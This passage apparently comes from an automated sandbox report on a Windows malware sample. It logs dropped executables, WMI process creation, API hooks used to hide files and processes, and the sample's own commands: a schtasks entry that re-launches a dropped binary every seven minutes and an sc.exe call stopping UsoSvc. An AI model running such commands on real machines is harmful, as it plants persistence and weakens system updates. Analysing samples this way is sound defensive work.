                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7103562Jump to behavior
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: section name: .didat
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: section name: _RDATA
                                Source: GargantuanS.exe.0.drStatic PE information: section name: .00cfg
                                Source: GargantuaN.exe.0.drStatic PE information: section name: .didat
                                Source: nhxnqwkhmssh.exe.2.drStatic PE information: section name: .00cfg
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D6F640 push ecx; ret 1_2_00D6F653
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D6EB78 push eax; ret 1_2_00D6EB96
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB96ACDD push rcx; retf 003Fh7_2_000001B0BB96ACDE
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB99C6DD push rcx; retf 003Fh7_2_000001B0BB99C6DE
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC4E40D pushfd ; ret 8_2_00007FFD9BC4E422
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BC445D5 push eax; ret 8_2_00007FFD9BC445E9
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE63DD push C181916Ch; ret 8_2_00007FFD9BCE63EE
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE5013 push eax; ret 8_2_00007FFD9BCE5014
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE26E8 push eax; ret 8_2_00007FFD9BCE26EF
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE32B4 push edx; ret 8_2_00007FFD9BCE32B6
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE367D push eax; ret 8_2_00007FFD9BCE367E
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE019B push edx; ret 8_2_00007FFD9BCE019C
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE357F push esp; retf 8_2_00007FFD9BCE3585
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE495A push ecx; ret 8_2_00007FFD9BCE495B
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE315C push edx; ret 8_2_00007FFD9BCE315D
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE146F pushad ; ret 8_2_00007FFD9BCE1470
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE148D pushad ; ret 8_2_00007FFD9BCE14A1
                                Source: C:\PerfDll\hyperProviderSavesinto.exeCode function: 8_2_00007FFD9BCE2885 push eax; ret 8_2_00007FFD9BCE2886
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26DACDD push rcx; retf 003Fh9_2_00000216D26DACDE
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D270C6DD push rcx; retf 003Fh9_2_00000216D270C6DE
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BD163E3 push C181916Ch; ret 20_2_00007FFD9BD163EE
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BD1357F push esp; retf 20_2_00007FFD9BD13585
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BD1148C pushad ; ret 20_2_00007FFD9BD114A1
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeCode function: 20_2_00007FFD9BD1146F pushad ; ret 20_2_00007FFD9BD11470
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E905ACDD push rcx; retf 003Fh38_2_00000150E905ACDE
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93FC6DD push rcx; retf 003Fh38_2_00000150E93FC6DE
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE7ACDD push rcx; retf 003Fh40_2_00000267FCE7ACDE
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCEAC6DD push rcx; retf 003Fh40_2_00000267FCEAC6DE
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B50ACDD push rcx; retf 003Fh45_2_000002359B50ACDE
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B53C6DD push rcx; retf 003Fh45_2_000002359B53C6DE
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC62ACDD push rcx; retf 003Fh49_2_00000225DC62ACDE
                                Source: hyperProviderSavesinto.exe.1.drStatic PE information: section name: .text entropy: 7.557452107884656
                                Source: KZcLqgnLvRf.exe.8.drStatic PE information: section name: .text entropy: 7.557452107884656
                                Source: RuntimeBroker.exe.8.drStatic PE information: section name: .text entropy: 7.557452107884656
                                Source: KZcLqgnLvRf.exe0.8.drStatic PE information: section name: .text entropy: 7.557452107884656
                                Source: KZcLqgnLvRf.exe1.8.drStatic PE information: section name: .text entropy: 7.557452107884656

                                Persistence and Installation Behavior

                                barindex
                                Creates processes via WMI
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeFile created: C:\Users\user\Desktop\XVmuemSr.logJump to dropped file
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeFile created: C:\Users\user\Desktop\phOzxInG.logJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Users\user\Desktop\LugVktua.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeFile created: C:\PerfDll\hyperProviderSavesinto.exeJump to dropped file
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeFile created: C:\Users\user\Desktop\IkSFhrpY.logJump to dropped file
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeFile created: C:\Users\user\AppData\Local\Temp\GargantuaN.exeJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Recovery\WmiPrvSE.exeJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Users\user\Desktop\kEwbgeKe.logJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Recovery\RuntimeBroker.exeJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Users\user\Desktop\vsaRQqFM.logJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exeJump to dropped file
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeFile created: C:\Users\user\AppData\Local\Temp\GargantuanS.exeJump to dropped file
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeFile created: C:\Users\user\Desktop\KEMGRwnV.logJump to dropped file
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeFile created: C:\Users\user\Desktop\zQhPhksn.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeFile created: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exeJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exeJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Users\user\Desktop\msAjSsFc.logJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Users\user\Desktop\WiKMUFpI.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeFile created: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exeJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exeJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exeJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Users\user\Desktop\msAjSsFc.logJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Users\user\Desktop\WiKMUFpI.logJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Users\user\Desktop\LugVktua.logJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Users\user\Desktop\vsaRQqFM.logJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Users\user\Desktop\kEwbgeKe.logJump to dropped file
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeFile created: C:\Users\user\Desktop\IkSFhrpY.logJump to dropped file
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeFile created: C:\Users\user\Desktop\KEMGRwnV.logJump to dropped file
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeFile created: C:\Users\user\Desktop\zQhPhksn.logJump to dropped file
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeFile created: C:\Users\user\Desktop\phOzxInG.logJump to dropped file
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeFile created: C:\Users\user\Desktop\XVmuemSr.logJump to dropped file

                                Boot Survival

                                barindex
                                Uses schtasks.exe or at.exe to add and modify task schedules
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 7 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /f
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Hooks files or directories query functions (used to hide files and directories)
                                Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                                Hooks processes query functions (used to hide processes)
                                Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                                Hooks registry keys query functions (used to hide registry keys)
                                Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                                Loading BitLocker PowerShell Module
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Modifies the prolog of user mode functions (user mode inline hooks)
                                Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
